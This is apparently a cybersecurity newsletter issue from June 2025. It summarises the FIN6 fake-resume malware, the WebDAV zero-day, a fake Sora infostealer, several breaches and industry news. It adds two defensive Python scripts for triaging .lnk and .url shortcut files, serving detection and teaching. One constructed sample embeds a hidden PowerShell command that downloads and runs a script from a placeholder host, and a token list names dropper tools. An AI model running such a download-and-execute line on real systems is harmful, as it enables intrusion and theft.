Cyber Briefing: 2025.06.11
FIN6 uses fake resumes to deliver malware, Microsoft patches WebDAV flaw, and fake SoraAI lures steal data. Sompo breach hits 17.5M, BHA attacked, DDoS hits Roularta. Swimlane raises $45M.
👉 What's trending in cybersecurity today?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please Subscribe
🚨 Cyber Alerts
1. FIN6 Uses Fake Resumes To Hack Recruiters
The FIN6 hacking group has flipped the script on typical hiring scams by posing as job seekers to target recruiters and Human Resources staff with the 'More Eggs' malware. The attackers build rapport on platforms like LinkedIn and Indeed before sending phishing emails containing non-clickable URLs to fake resume sites; because the recipient has to type the link in by hand, automated link scanners never follow it, and the sites use device fingerprinting and CAPTCHAs so that the payload is served only to likely targets rather than to sandboxes or researchers. Victims are prompted to download a ZIP archive containing a malicious LNK file, which runs a script that installs the 'More Eggs' backdoor, a malware-as-a-service tool used for credential theft and for staging ransomware. The campaign is a reminder that recruiters should treat unsolicited portfolios with caution, verify a candidate's identity independently, and avoid opening archive or shortcut files fetched from an external site.
2. Microsoft Fixes Exploited WebDAV Zero Day
Microsoft has released security updates for 67 vulnerabilities, including a WebDAV zero-day, CVE-2025-33053, that it confirmed is being exploited in the wild. Check Point attributed the exploitation to the Stealth Falcon group, which used the flaw to deliver a custom implant called Horus Agent to a Turkish defense company. The attack chain begins with a malicious .url shortcut file that causes a legitimate Windows program to load content from an attacker-controlled WebDAV server, giving the attacker code execution once the shortcut is opened; CISA has added the CVE to its Known Exploited Vulnerabilities catalog. This month's patches also address other critical issues, including a privilege escalation flaw in Power Automate and a Secure Boot bypass discovered by Binarly.
3. Fake Sora AI Lure Installs Infostealer
Cybercriminals are exploiting the popularity of OpenAI's Sora video generation model to distribute an infostealer disguised as a shortcut file named "SoraAI.lnk". Opening the shortcut launches PowerShell, which downloads malicious batch and Python scripts from GitHub and runs them in a multi-stage chain. The final payload steals a wide range of sensitive data, including browser cookies and saved passwords, cryptocurrency wallets, and Wi-Fi credentials, and exfiltrates it through the Telegram bot API. The lure underscores the risk of running files from unofficial sources: a single shortcut file can lead to identity theft and further compromise.
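Both of the shortcut-file lures above (a ZIP-wrapped "resume" LNK in the FIN6 campaign and the standalone SoraAI.lnk) can be triaged the same way: ignore the file extension, recognise the shell-link header by its bytes, and pull out what the shortcut would actually launch. The following is an added example written for this briefing, not code from either campaign's analysis. It parses the ShellLinkHeader and StringData blocks of the MS-SHLLINK format and flags launch arguments that look like a script dropper; the archive, file names, the example.invalid URL and the heuristic token list are all constructed for the demonstration.

```python
"""Triage .lnk files found inside an archive or on their own.

Added example: builds constructed LNK samples, parses the shell-link header
and StringData per MS-SHLLINK, and flags launch arguments that look like a
script dropper. Sample names, archive contents and URLs are made up.
"""
import io
import struct
import zipfile

# HeaderSize (0x4C) followed by the fixed shell-link CLSID {00021401-0000-0000-C000-000000000046}
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
HAS_IDLIST, HAS_LINKINFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))
# Heuristic tokens; an assumption to tune per environment, not a vendor signature.
SUSPICIOUS = ("powershell", "cmd.exe", "mshta", "wscript", "cscript", "rundll32",
              "regsvr32", "-w hidden", "-nop", "-enc", "iex", "http")


def parse_lnk(data: bytes):
    """Return the StringData fields of a .lnk, or None if the bytes are not a shell link."""
    if len(data) < 76 or data[:20] != LNK_MAGIC:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:                     # skip LinkTargetIDList: 2-byte size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                   # skip LinkInfo: its 4-byte size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:            # StringData blocks appear in this fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return fields


def suspicious_tokens(fields):
    """Tokens from SUSPICIOUS that appear in the launch path, working dir or arguments."""
    haystack = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    return [t for t in SUSPICIOUS if t in haystack]


def scan_zip(zip_bytes: bytes):
    """Every archive entry that is a shell link (by content, not extension), with fields and hits."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            fields = parse_lnk(zf.read(info))
            if fields is not None:
                findings.append({"entry": info.filename, "fields": fields,
                                 "hits": suspicious_tokens(fields)})
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk for the sample below (no IDList, no LinkInfo)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = (LNK_MAGIC + struct.pack("<I", flags) + struct.pack("<I", 0)   # LinkFlags, FileAttributes
              + b"\x00" * 24                                                # three FILETIMEs
              + struct.pack("<III", 0, 0, 1)                                 # FileSize, IconIndex, SW_SHOWNORMAL
              + struct.pack("<HH", 0, 0) + struct.pack("<II", 0, 0))         # HotKey, Reserved1-3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body


# Constructed sample archive: a harmless text file plus a "resume" that is really a shell link.
_SAMPLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -nop -c "iwr https://example.invalid/stage.ps1 | iex"')  # example.invalid is a placeholder
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w", zipfile.ZIP_DEFLATED) as _zf:
    _zf.writestr("notes.txt", "portfolio attached\n")
    _zf.writestr("Resume_John_Doe.pdf.lnk", _SAMPLE_LNK)
SAMPLE_ZIP = _buf.getvalue()

if __name__ == "__main__":
    for f in scan_zip(SAMPLE_ZIP):
        print(f["entry"], "->", f["fields"].get("arguments"), "| hits:", f["hits"])
```

The parser deliberately matches on the header bytes rather than the `.lnk` suffix, since a double extension such as `Resume.pdf.lnk` is exactly what these lures rely on, and it only reads the StringData blocks, which is where the launched program and its arguments live; real samples often carry a LinkTargetIDList and LinkInfo as well, which the parser skips by size.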
For more alerts, click here!
💥 Cyber Incidents
4. Sompo Data Breach Puts 17.5M Records At Risk
Sompo Japan Insurance has announced that up to 17.5 million customer records may have been leaked after an unauthorized third party gained access to its internal systems in April 2025. The data that was potentially viewed or stolen includes policyholder names, contact information, and insurance policy numbers, although no illegal use of the information has been confirmed yet. The company is now contacting affected individuals and has set up a dedicated support line, but this breach is part of a rising trend of major data leaks in Japan. This incident at Sompo Japan is one of the largest of its kind and follows other massive breaches at companies like Benesse Corporation and an NTT Japan West subsidiary in recent years.
5. BHA Hit By Ransomware But Races Continue
The British Horseracing Authority (BHA) has become the latest major UK organization targeted by a cyberattack, which it identified as a ransomware incident at the end of last week. As a result, the BHA's London office has been temporarily closed with staff working remotely while an investigation is conducted with external cybersecurity specialists, and law enforcement has been notified. The sporting body has assured the public that the incident appears limited to internal systems and that the delivery of all scheduled racedays has continued and will proceed as normal. This attack follows a recent wave of similar cyber incidents that have impacted major UK retailers like Marks & Spencer and the Co-op, highlighting a concerning trend.
6. DDoS Disrupts Roularta Media In Belgium
Roularta Media Group in Belgium was targeted by a significant cyberattack on Tuesday, which was identified as a Distributed Denial of Service (DDoS) attack that overloaded its servers with traffic. This has caused major disruptions, making it difficult for users to access the websites and apps of its popular media brands, such as Knack and Libelle. The DDoS attacks also impacted operations at the company’s printing facility in Roeselare, potentially delaying the delivery of newspapers and magazines. While there is currently no indication of a ransomware attack, the company's teams are working with IT provider Proximus to resolve the issue as quickly as possible.
For more incidents, click here!
📢 Cyber News
7. Half Of Mobile Users Face Daily Scams
A new Malwarebytes survey of 1,300 adults found that nearly half (44%) of mobile users face scams and threats daily, with two-thirds admitting it's increasingly difficult to spot them. These threats, most commonly delivered via email, SMS, and social media, frequently use social engineering, a trend corroborated by other studies showing a steep rise in mobile-specific phishing attacks. Many users have also encountered extortion threats like ransomware and deepfake scams, with the report finding three-quarters of victims have experienced emotional harm as a result. Researchers conclude that as cybercriminals adopt more sophisticated AI technologies, users must be empowered with better tools and knowledge to spot, stop, and report scams.
8. Guilty Pleas In $37M Pig Butchering Scam
Five men from China, the United States, and Turkey have pleaded guilty to their involvement in an international crime ring that laundered nearly $37 million stolen from U.S. victims. The funds were obtained from "pig butchering" crypto scams run from Cambodia, where victims were tricked into sending money to a Bahamas bank account under the name of a shell company, Axis Digital Limited. The conspirators, including Los Angeles network leader Joseph Wong, used U.S. shell companies and international accounts to funnel the money, eventually converting it to Tether (USDT) and sending it to a wallet in Cambodia. These new guilty pleas bring the total number of convicted members in this crime ring to eight, highlighting a major law enforcement success against large-scale crypto fraud.
9. Swimlane Raises $45M For AI SecOps Platform
Denver-based security automation firm Swimlane announced it has raised $45 million in a growth funding round led by Energy Impact Partners and Activate Capital, bringing its total funding to $215 million. The company's platform uses agentic AI, including a SecOps companion named Hero, to provide hyperautomation capabilities for unified management of security tools and signals. Serving clients that include 26 U.S. federal agencies and over 50 Global 1000 companies, Swimlane says its technology can automate over 25 million daily actions for each customer. Swimlane will use the new capital to invest in further product innovation and to scale its go-to-market operations, with a focus on global channel expansion in North America and EMEA.
For more news, click here!
📈Cyber Stocks
As U.S. markets open on Wednesday, June 11, 2025, these cybersecurity leaders display modest daily shifts amid mixed sector catalysts:
Zscaler (ZS): Trading at $297.97, down 0.62%, pressured by insider stock sales, though recent analyst upgrades and steady institutional buying support confidence.
Varonis (VRNS): Trading at $50.48, down 0.36%, maintaining flat movement as demand for data-centric security remains stable.
Palo Alto Networks (PANW): Trading at $195.95, down 0.17%, showing resilience despite broader tech volatility, underpinned by ongoing investment in AI-enhanced next-gen security.
CrowdStrike (CRWD): Trading at $467.65, up 0.70%, following a 4% pullback this week on cautious guidance; analysts still rate it a strong buy, with price targets averaging $488.
Fortinet (FTNT): Trading at $101.63, down 0.42%, on track after recent gains, powered by robust financials and strong buyback activity.
💡 Cyber Tip
Update Your Windows Devices Now to Stay Protected.
Microsoft has fixed an actively exploited vulnerability (CVE-2025-33053) in its WebDAV client that allows attackers to run code on a machine just by getting the user to open a specially crafted .url shortcut file. The flaw is already being used by a hacking group known as Stealth Falcon.
✅ What you should do
Open Settings > Windows Update on your Windows devices and install all available updates right away; the June 2025 cumulative update contains the fix.
Be extra cautious about opening unknown files, especially shortcut files (ending in .url or .lnk) or archives received by email or messaging apps.
Use reputable antivirus software and make sure it's up to date.
If you're in a sensitive industry like defense or government, consult your security team for any additional steps.
🔒 Why this matters
This vulnerability is being used right now in targeted attacks. Updating your system is the easiest and most effective way to stop it from affecting you.
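The tip says to be cautious with .url files; the check below shows what "cautious" can mean in practice. It is an added example for this briefing, not code from Microsoft, Check Point or the exploit analysis. A Windows .url file is a small INI file with an [InternetShortcut] section; besides URL= it can carry WorkingDirectory= and IconFile=, and any of those pointing at a UNC path or a WebDAV share (Windows spells WebDAV shares as \\host@SSL\DavWWWRoot\... or \\host@80\...) means the shortcut reaches off the machine when opened. The sample shortcuts, the 203.0.113.10 address (documentation range) and the field heuristics are constructed for the example; they are not the real exploit file.

```python
"""Inspect Windows .url (Internet Shortcut) files for remote UNC/WebDAV references.

Added example, not from the advisory. Samples below are constructed.
"""
import configparser
import re

WEBDAV_HOST_MARKERS = ("@ssl", "@80", "@443")   # Windows WebDAV UNC host syntax


def classify_target(value: str) -> str:
    """Classify a .url field value as 'web', 'local', 'unc' or 'webdav'."""
    v = value.strip()
    if re.match(r"^https?://", v, re.I):
        return "web"
    m = re.match(r"^file:[\\/]*(.*)$", v, re.I)
    if m:                                       # file:///C:/x is local, file://host/share is not
        v = m.group(1)
        if re.match(r"^[A-Za-z]:", v):
            return "local"
        v = "\\\\" + v                          # remainder is host\share
    v = v.replace("/", "\\")
    if v.startswith("\\\\"):
        host = v[2:].split("\\", 1)[0].lower()
        if any(mark in host for mark in WEBDAV_HOST_MARKERS) or "davwwwroot" in v.lower():
            return "webdav"
        return "unc"
    return "local"


def inspect_url_file(text: str) -> dict:
    """Parse a .url file and report fields that reach outside the machine or off the web."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.lstrip("\ufeff"))      # tolerate a UTF-8 BOM
    if not cp.has_section("InternetShortcut"):
        return {"valid": False, "findings": [], "suspicious": False}
    sec = cp["InternetShortcut"]               # option names are matched case-insensitively
    findings = []
    for key in ("URL", "WorkingDirectory", "IconFile"):
        value = sec.get(key)
        if not value:
            continue
        kind = classify_target(value)
        if key == "URL" and re.match(r"^file:", value.strip(), re.I):
            # An "internet" shortcut that launches a local program instead of a web page
            findings.append({"field": key, "kind": "file-scheme", "value": value})
        if kind in ("unc", "webdav") or (key != "URL" and kind == "web"):
            findings.append({"field": key, "kind": kind, "value": value})
    return {"valid": True, "findings": findings, "suspicious": bool(findings)}


# Constructed samples (not the real exploit file). 203.0.113.10 is a documentation address.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
SUSPICIOUS_URL_FILE = ("[InternetShortcut]\r\n"
                       "URL=file:///C:/Windows/System32/notepad.exe\r\n"
                       "WorkingDirectory=\\\\203.0.113.10@SSL\\DavWWWRoot\\tools\r\n"
                       "IconFile=\\\\203.0.113.10\\icons\\x.ico\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        report = inspect_url_file(sample)
        print(name, "suspicious =", report["suspicious"])
        for f in report["findings"]:
            print("  ", f["field"], f["kind"], f["value"])
```

A web URL in the URL= field is what the file is for and is not flagged; a file: scheme in that field, or a working directory or icon that lives on a UNC or WebDAV share, is what warrants a look before the shortcut is opened. Patching remains the fix; this only helps decide which attachments deserve suspicion.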
📚 Cyber Book
Stop The Cyber Bleeding: What Healthcare Executives and Board Members Must Know About Enterprise Cyber Risk Management by Bob Chaput
That concludes today’s briefing. You can check the top headlines here!
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.